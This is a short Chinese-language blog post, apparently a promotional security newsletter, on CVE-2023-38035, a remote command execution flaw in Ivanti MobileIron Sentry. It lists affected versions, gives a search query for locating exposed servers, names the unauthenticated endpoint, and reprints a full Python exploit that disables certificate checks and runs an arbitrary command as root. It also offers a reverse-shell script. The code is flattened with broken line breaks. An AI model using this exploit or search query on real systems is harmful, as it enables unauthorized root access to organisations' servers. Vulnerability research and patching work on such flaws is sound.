叮～你有新的速递！CVE-2023-38035 RCE漏洞（附EXP）

0x01 前言

由于 Apache HTTPD 配置限制不足,Ivanti MobileIron Sentry 版本 9.18.0 及更低版本中的 MICS 管理门户中存在安全漏洞，该漏洞可绕过管理界面上的身份验证控制，执行任意命令，通过该漏洞可以获取服务器权限。

0x02 影响平台

Ivanti Sentry 9.18、9.17、9.16、9.15及以下

0x03 漏洞复现

搜索语法

title="MobileIron System Manager"body="Requires a local Sentry administrative user"

页面是这个酱紫

PoC如下，访问这个payload若存在未授权则存在漏洞：

/mics/services/MICSLogService

Success~

反弹shell可以直接利用GitHub大佬写好的脚本

后台回复38305也可获取

https://github.com/horizon3ai/CVE-2023-38035
from pyhessian.client import HessianProxyfrom http.client import HTTPSConnectionimport sslimport sysimport argparseimport requestsimport urllib3urllib3.disable_warnings()

# Backup original constructor_original_https_init = HTTPSConnection.__init__
def patched_https_init(self, *args, **kwargs):    # If context is not provided, use unverified context    if 'context' not in kwargs:        kwargs['context'] = ssl._create_unverified_context()    _original_https_init(self, *args, **kwargs)

def exploit(base_url, command):    # Define the Hessian service endpoint    service_url = f"{base_url}/mics/services/MICSLogService"        r = requests.get(service_url, verify=False)    if r.status_code != 405:        print('[-] Vulnerable endpoint was not reachable - bailing')        sys.exit()
    # Monkey-patch the constructor    HTTPSConnection.__init__ = patched_https_init        dto = {        "command": command,        "isRoot": True,    }        # Create a Hessian proxy for the service    proxy = HessianProxy(service_url)        # Call a method on the Hessian service:    details = proxy.uploadFileUsingFileInput(dto, None)    if details:        print('[+] Successfully executed command on target!')
if __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument('-u', '--url', help='The URL of the target', required=True)    parser.add_argument('-c', '--cmd', help='The command to run', required=True)    args = parser.parse_args()
    exploit(args.url, args.cmd)